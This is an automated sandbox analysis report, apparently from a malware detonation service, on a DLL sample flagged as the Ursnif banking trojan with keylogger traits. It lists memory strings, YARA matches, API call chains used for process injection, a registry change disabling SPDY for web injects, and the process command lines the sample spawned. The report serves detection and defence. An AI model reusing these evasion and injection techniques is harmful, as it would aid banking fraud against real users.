Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: loaddll32.exe, 00000000.00000002.891686780.000000001008B000.00000002.00020000.sdmp String found in binary or memory: http://www.xnview.comJ
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000018.00000002.859302695.000001D7AC0CF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY
Contains functionality to read the clipboard data
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1007F8B0 EntryPoint,LoadIconW,CreateMenu,CloseFigure,GetDoubleClickTime,CharUpperW,GetMessageExtraInfo,OpenIcon,GetMenuItemCount,EndDoc,IsIconic,GetWindowContextHelpId,GetClipboardData,StrokePath,UnrealizeObject,GetMapMode,IsCharAlphaA,FlattenPath,EnumClipboardFormats,GetSysColorBrush,DestroyMenu,GetDCBrushColor,UpdateColors,GetColorSpace,CharNextA,GetQueueStatus,GetPolyFillMode,DestroyWindow,IsCharLowerA,SetMetaRgn,GetObjectType,EndPath,GetObjectType,IsCharAlphaW,OemKeyScan,CloseMetaFile,GetSysColorBrush,LoadCursorFromFileA,GetPixelFormat,SwapBuffers,UnrealizeObject,GetGraphicsMode,GetGraphicsMode,GetMapMode,UnrealizeObject,FlattenPath,GetMessagePos,GetTopWindow,PathToRegion,CloseWindow,GetDlgCtrlID,GetStretchBltMode,GetProcessWindowStation,CancelDC,CharLowerA,GetThreadDesktop,VkKeyScanW,CreatePatternBrush,DeleteColorSpace,IsWindowUnicode,WindowFromDC,GetKeyState,IsCharLowerA,CreateHalftonePalette,GetClipboardSequenceNumber,PathToRegion,GetMenuCheckMarkDimensions,LoadIconA,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextChars 0_2_1007F8B0
Yara detected Keylogger Generic
Source: Yara match File source: https___purefile24.top_4352wedfoifom.dll, type: SAMPLE
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01111A0B NtMapViewOfSection, 0_2_01111A0B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01111F8C GetProcAddress,NtCreateSection,memset, 0_2_01111F8C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_011115D2 GetLastError,NtClose,LdrInitializeThunk, 0_2_011115D2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_011123E5 NtQueryVirtualMemory, 0_2_011123E5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02679E28 NtOpenProcess,LdrInitializeThunk,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_02679E28
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_026764BF NtMapViewOfSection, 0_2_026764BF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02674093 GetProcAddress,NtCreateSection,memset, 0_2_02674093
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0267B2CD NtQueryVirtualMemory, 0_2_0267B2CD
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose, 32_2_00FC88E0
Source: C:\Windows\System32\control.exe Code function: 32_2_00FCA9D8 NtWriteVirtualMemory, 32_2_00FCA9D8
Source: C:\Windows\System32\control.exe Code function: 32_2_00FB91C0 NtQueryInformationProcess, 32_2_00FB91C0
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC1920 NtReadVirtualMemory, 32_2_00FC1920
Source: C:\Windows\System32\control.exe Code function: 32_2_00FB6104 NtQueryInformationProcess, 32_2_00FB6104
Source: C:\Windows\System32\control.exe Code function: 32_2_00FCDE98 NtAllocateVirtualMemory, 32_2_00FCDE98
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC67C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 32_2_00FC67C8
Source: C:\Windows\System32\control.exe Code function: 32_2_00FCD748 NtMapViewOfSection, 32_2_00FCD748
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC7B34 NtCreateSection, 32_2_00FC7B34
Source: C:\Windows\System32\control.exe Code function: 32_2_00FCEB10 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 32_2_00FCEB10
Source: C:\Windows\System32\control.exe Code function: 32_2_00FE9002 NtProtectVirtualMemory,NtProtectVirtualMemory, 32_2_00FE9002
Source: C:\Windows\System32\rundll32.exe Code function: 35_2_00000284AA6E88E0 NtQueryInformationToken,NtQueryInformationToken,NtClose, 35_2_00000284AA6E88E0
Source: C:\Windows\System32\rundll32.exe Code function: 35_2_00000284AA6D91C0 NtQueryInformationProcess, 35_2_00000284AA6D91C0
Source: C:\Windows\System32\rundll32.exe Code function: 35_2_00000284AA709002 NtProtectVirtualMemory,NtProtectVirtualMemory, 35_2_00000284AA709002
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_011121C4 0_2_011121C4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0267B0AC 0_2_0267B0AC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02678534 0_2_02678534
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC2A04 32_2_00FC2A04
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC67C8 32_2_00FC67C8
Source: C:\Windows\System32\control.exe Code function: 32_2_00FB932C 32_2_00FB932C
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC64DC 32_2_00FC64DC
Source: C:\Windows\System32\control.exe Code function: 32_2_00FCC8A8 32_2_00FCC8A8
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC909C 32_2_00FC909C
Source: C:\Windows\System32\control.exe Code function: 32_2_00FB3498 32_2_00FB3498
Source: C:\Windows\System32\control.exe Code function: 32_2_00FCCC80 32_2_00FCCC80
Source: C:\Windows\System32\control.exe Code function: 32_2_00FCF06C 32_2_00FCF06C
Source: C:\Windows\System32\control.exe Code function: 32_2_00FCCC1C 32_2_00FCCC1C
Source: C:\Windows\System32\control.exe Code function: 32_2_00FBFDD8 32_2_00FBFDD8
Source: C:\Windows\System32\control.exe Code function: 32_2_00FD31A4 32_2_00FD31A4
Source: C:\Windows\System32\control.exe Code function: 32_2_00FBA1A0 32_2_00FBA1A0
Source: C:\Windows\System32\control.exe Code function: 32_2_00FD117C 32_2_00FD117C
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC096B 32_2_00FC096B
Source: C:\Windows\System32\control.exe Code function: 32_2_00FD654C 32_2_00FD654C
Source: C:\Windows\System32\control.exe Code function: 32_2_00FB8D2C 32_2_00FB8D2C
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC051C 32_2_00FC051C
Source: C:\Windows\System32\control.exe Code function: 32_2_00FD7EDC 32_2_00FD7EDC
Source: C:\Windows\System32\control.exe Code function: 32_2_00FB7ED8 32_2_00FB7ED8
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC0EC4 32_2_00FC0EC4
Source: C:\Windows\System32\control.exe Code function: 32_2_00FB4AA0 32_2_00FB4AA0
Source: C:\Windows\System32\control.exe Code function: 32_2_00FBA6A4 32_2_00FBA6A4
Source: C:\Windows\System32\control.exe Code function: 32_2_00FBB2A4 32_2_00FBB2A4
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC3A9C 32_2_00FC3A9C
Source: C:\Windows\System32\control.exe Code function: 32_2_00FD5A88 32_2_00FD5A88
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC4670 32_2_00FC4670
Source: C:\Windows\System32\control.exe Code function: 32_2_00FC2648 32_2_00FC2648
Source: C:\Windows\System32\control.exe Code function: 32_2_00FB964C 32_2_00FB964C
Source: C:\Windows\System32\control.exe Code function: 32_2_00FD7228 32_2_00FD7228
Source: C:\Windows\System32\control.exe Code function: 32_2_00FCC224 32_2_00FCC224
Source: C:\Windows\System32\control.exe Code function: 32_2_00FD6BDC 32_2_00FD6BDC
Source: C:\Windows\System32\control.exe Code function: 32_2_00FCF7D4 32_2_00FCF7D4
Source: C:\Windows\System32\control.exe Code function: 32_2_00FD4FA8 32_2_00FD4FA8
Source: C:\Windows\System32\control.exe Code function: 32_2_00FB6380 32_2_00FB6380
Source: C:\Windows\System32\control.exe Code function: 32_2_00FB5B40 32_2_00FB5B40
Source: C:\Windows\System32\rundll32.exe Code function: 35_2_00000284AA6E2A04 35_2_00000284AA6E2A04
Source: C:\Windows\System32\rundll32.exe Code function: 35_2_00000284AA6D932C 35_2_00000284AA6D932C
Source: C:\Windows\System32\rundll32.exe Code function: 35_2_00000284AA6EF06C 35_2_00000284AA6EF06C
Source: C:\Windows\System32\rundll32.exe Code function: 35_2_00000284AA6ECC80 35_2_00000284AA6ECC80
Source: C:\Windows\System32\rundll32.exe Code function: 35_2_00000284AA6ECC1C 35_2_00000284AA6ECC1C
Source: C:\Windows\System32\rundll32.exe Code function: 35_2_00000284AA6E64DC 35_2_00000284AA6E64DC
One or more processes crash
Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 652
PE / OLE file has an invalid certificate
Source: https___purefile24.top_4352wedfoifom.dll Static PE information: invalid certificate
PE file contains strange resources
Source: https___purefile24.top_4352wedfoifom.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file does not import any functions
Source: xxfxarla.dll.28.dr Static PE information: No import functions for PE file found
Source: 5ycfw01g.dll.26.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: phoneinfo.dll
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: ext-ms-win-xblauth-console-l1.dll
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@47/62@3/2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0267A648 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 0_2_0267A648
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8E9E2BBA-2F7E-11EB-90EB-ECF4BBEA1588}.dat
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{3C647D8B-6BF2-CEE4-D530-CFE2D9647336}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{347FEBA0-0321-86D2-2DA8-E71AB15C0BEE}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{30798985-CF3A-E269-D964-73361DD857CA}
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{0C917B27-FB18-1E3A-E500-5F32E9340386}
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6536
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF479DF3B05A4A00F7.TMP
Source: https___purefile24.top_4352wedfoifom.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: https___purefile24.top_4352wedfoifom.dll ReversingLabs: Detection: 14%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\https___purefile24.top_4352wedfoifom.dll'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6740 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17420 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:82960 /prefetch:2
